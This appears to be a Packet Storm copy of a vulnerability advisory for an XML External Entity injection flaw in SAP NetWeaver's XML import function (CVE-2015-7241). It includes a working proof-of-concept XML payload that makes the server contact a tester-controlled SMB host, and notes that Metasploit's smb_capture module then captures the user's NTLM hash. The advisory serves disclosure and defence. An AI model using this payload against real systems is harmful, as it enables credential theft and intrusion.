exploit the possibilities

SAP Netweaver XML External Entity Injection

SAP Netweaver XML External Entity Injection
Posted Sep 21, 2015
Authored by Lukasz Miedzinski

SAP Netweaver versions prior to 7.01 suffer from an XXE injection vulnerability.

tags | exploit, xxe
advisories | CVE-2015-7241
MD5 | d444e2bcca3d307d4a56fd9e1a5ed178

SAP Netweaver XML External Entity Injection

Change Mirror Download
Title: SAP Netwaver - XML External Entity Injection
Author: Lukasz Miedzinski
GPG: Public key provided in attachment
Date: 29/10/2014
CVE: CVE-2015-7241

Affected software :
===================

SAP Netwear : <7.01

Vendor advisories (only for customers):
===================
External ID : 851975 2014
Title: XML External Entity vulnerability in SAP XML Parser
Security Note: 2098608
Advisory Plan Date: 12/5/2014
Delivery date of fix/Patch Day: 10/2/2014
CVSS Base Score: 5.5
CVSS Base Vector: AV:N/AC:L/AU:S/C:P/I:N/A:P


Description :
=============
XML External Entity Injection vulnerability has been found in the XML
parser in the System

Administration->XML Content and Actions -> Import section.


Vulnerabilities :
*****************

XML External Entity Injection :
======================


Example show how pentester is able to get NTLM hash of application's user.

Content of file (PoC) :

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "file:////Tester.IP/test"> %remote; %param1; ]>
<root/>

When pentester has metasploit smb_capture module run, then application
will contatc him and provide

NTLM hash of user.


Contact :
=========

Lukasz[dot]Miedzinski[at]gmail[dot]com

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    6 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close